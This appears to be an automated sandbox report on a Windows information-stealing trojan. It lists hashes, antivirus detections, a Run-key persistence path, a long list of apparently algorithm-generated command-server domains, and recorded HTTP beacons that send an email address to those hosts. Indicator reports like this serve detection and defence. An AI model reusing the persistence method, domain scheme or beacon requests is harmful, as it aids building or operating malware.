Analysis Date: 2015-08-03 17:50:13
MD5: 0e478f5b6d3d2cb425ba404b95b9018d
SHA1: 7fec2a45cefd0269f78e79cf0270823f6327bc50

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: df89a282f6c614c031a23e8ea808e2c0 sha1: cae84b9048073100b18de8b846ce2026cd2e0928 size: 296448
Section .rdata md5: 917b9479003a6db256cbd72b7a49c6e3 sha1: 245a1342132d29d5090ea15c449740a913b2c620 size: 33280
Section .data  md5: 7c1162e071ccfb5081e348315bdd7d65 sha1: dd1ce6126cb3c71fbdd1767486781dbe75a38a51 size: 95232
Timestamp: 2014-10-30 09:50:52
Packer: Microsoft Visual C++ ?.?
PEhash: 6071cb397126716985591f0699d1abaed1b0424a
IMPhash: e1263d0b3b8448429d20716241c150da
AV Rising: no_virus
AV Mcafee: Trojan-FEMT!0E478F5B6D3D
AV Avira (antivir): TR/ATRAPS.Gen2
AV Twister: no_virus
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Eset (nod32): Win32/Agent.VNC
AV Grisoft (avg): Error Scanning File
AV Symantec: Downloader.Upatre!g15
AV Fortinet: W32/Kryptik.DDQD!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: no_virus
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Zbot.WHE
AV Authentium: W32/Wonton.B2.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.FBAccountLock
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TSPY_NIVDORT.SMB
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader12.23288
AV F-Secure: Gen:Variant.Symmi.22722
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Foundation Remote Event Accounts ➝ C:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.dpf
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\qhtyggdsp\kdrfdefwaudi.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.exe"

Network Details:

DNS doctoropinion.net (Type: A) ➝ 128.199.249.48
DNS brokenpromise.net (Type: A) ➝ 69.172.201.208
DNS outsidesupply.net (Type: A) ➝ 64.74.223.47
DNS outsideoffice.net (Type: A) ➝ 108.162.202.47
DNS outsideoffice.net (Type: A) ➝ 108.162.201.47
DNS movementarrive.net (Type: A) ➝ 95.211.230.75
DNS buildingsupply.net (Type: A) ➝ 67.212.232.207
DNS buildingoffice.net (Type: A) ➝ 46.20.7.163
DNS storesupply.net (Type: A) ➝ 69.172.201.208
DNS severalletter.net (Type: A)
DNS materialletter.net (Type: A)
DNS severaldifferent.net (Type: A)
DNS materialdifferent.net (Type: A)
DNS movementshould.net (Type: A)
DNS outsideshould.net (Type: A)
DNS movementshort.net (Type: A)
DNS outsideshort.net (Type: A)
DNS movementopinion.net (Type: A)
DNS outsideopinion.net (Type: A)
DNS movementpromise.net (Type: A)
DNS outsidepromise.net (Type: A)
DNS buildingshould.net (Type: A)
DNS eveningshould.net (Type: A)
DNS buildingshort.net (Type: A)
DNS eveningshort.net (Type: A)
DNS buildingopinion.net (Type: A)
DNS eveningopinion.net (Type: A)
DNS buildingpromise.net (Type: A)
DNS eveningpromise.net (Type: A)
DNS storeshould.net (Type: A)
DNS mightshould.net (Type: A)
DNS storeshort.net (Type: A)
DNS mightshort.net (Type: A)
DNS storeopinion.net (Type: A)
DNS mightopinion.net (Type: A)
DNS storepromise.net (Type: A)
DNS mightpromise.net (Type: A)
DNS doctorshould.net (Type: A)
DNS prettyshould.net (Type: A)
DNS doctorshort.net (Type: A)
DNS prettyshort.net (Type: A)
DNS prettyopinion.net (Type: A)
DNS doctorpromise.net (Type: A)
DNS prettypromise.net (Type: A)
DNS fellowshould.net (Type: A)
DNS doubleshould.net (Type: A)
DNS fellowshort.net (Type: A)
DNS doubleshort.net (Type: A)
DNS fellowopinion.net (Type: A)
DNS doubleopinion.net (Type: A)
DNS fellowpromise.net (Type: A)
DNS doublepromise.net (Type: A)
DNS brokenshould.net (Type: A)
DNS resultshould.net (Type: A)
DNS brokenshort.net (Type: A)
DNS resultshort.net (Type: A)
DNS brokenopinion.net (Type: A)
DNS resultopinion.net (Type: A)
DNS resultpromise.net (Type: A)
DNS prepareshould.net (Type: A)
DNS desireshould.net (Type: A)
DNS prepareshort.net (Type: A)
DNS desireshort.net (Type: A)
DNS prepareopinion.net (Type: A)
DNS desireopinion.net (Type: A)
DNS preparepromise.net (Type: A)
DNS desirepromise.net (Type: A)
DNS strengthshould.net (Type: A)
DNS stillshould.net (Type: A)
DNS strengthshort.net (Type: A)
DNS stillshort.net (Type: A)
DNS strengthopinion.net (Type: A)
DNS stillopinion.net (Type: A)
DNS strengthpromise.net (Type: A)
DNS stillpromise.net (Type: A)
DNS movementsupply.net (Type: A)
DNS movementdistance.net (Type: A)
DNS outsidedistance.net (Type: A)
DNS movementoffice.net (Type: A)
DNS outsidearrive.net (Type: A)
DNS eveningsupply.net (Type: A)
DNS buildingdistance.net (Type: A)
DNS eveningdistance.net (Type: A)
DNS eveningoffice.net (Type: A)
DNS buildingarrive.net (Type: A)
DNS eveningarrive.net (Type: A)
HTTP GET http://doctoropinion.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GET http://brokenpromise.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GET http://outsidesupply.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GET http://outsideoffice.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GET http://movementarrive.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GET http://buildingsupply.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GET http://buildingoffice.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GET http://storesupply.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
Flows TCP 192.168.1.1:1031 ➝ 128.199.249.48:80
Flows TCP 192.168.1.1:1032 ➝ 69.172.201.208:80
Flows TCP 192.168.1.1:1033 ➝ 64.74.223.47:80
Flows TCP 192.168.1.1:1034 ➝ 108.162.202.47:80
Flows TCP 192.168.1.1:1035 ➝ 95.211.230.75:80
Flows TCP 192.168.1.1:1036 ➝ 67.212.232.207:80
Flows TCP 192.168.1.1:1037 ➝ 46.20.7.163:80
Flows TCP 192.168.1.1:1038 ➝ 69.172.201.208:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 646f6374 6f726f70   ..Host: doctorop
0x00000070 (00112)   696e696f 6e2e6e65 740d0a0d 0a         inion.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 62726f6b 656e7072   ..Host: brokenpr
0x00000070 (00112)   6f6d6973 652e6e65 740d0a0d 0a         omise.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6f757473 69646573   ..Host: outsides
0x00000070 (00112)   7570706c 792e6e65 740d0a0d 0a         upply.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6f757473 6964656f   ..Host: outsideo
0x00000070 (00112)   66666963 652e6e65 740d0a0d 0a         ffice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6d6f7665 6d656e74   ..Host: movement
0x00000070 (00112)   61727269 76652e6e 65740d0a 0d0a       arrive.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6275696c 64696e67   ..Host: building
0x00000070 (00112)   73757070 6c792e6e 65740d0a 0d0a       supply.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6275696c 64696e67   ..Host: building
0x00000070 (00112)   6f666669 63652e6e 65740d0a 0d0a       office.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 73746f72 65737570   ..Host: storesup
0x00000070 (00112)   706c792e 6e65740d 0a0d0a0a 0d0a       ply.net.......
Strings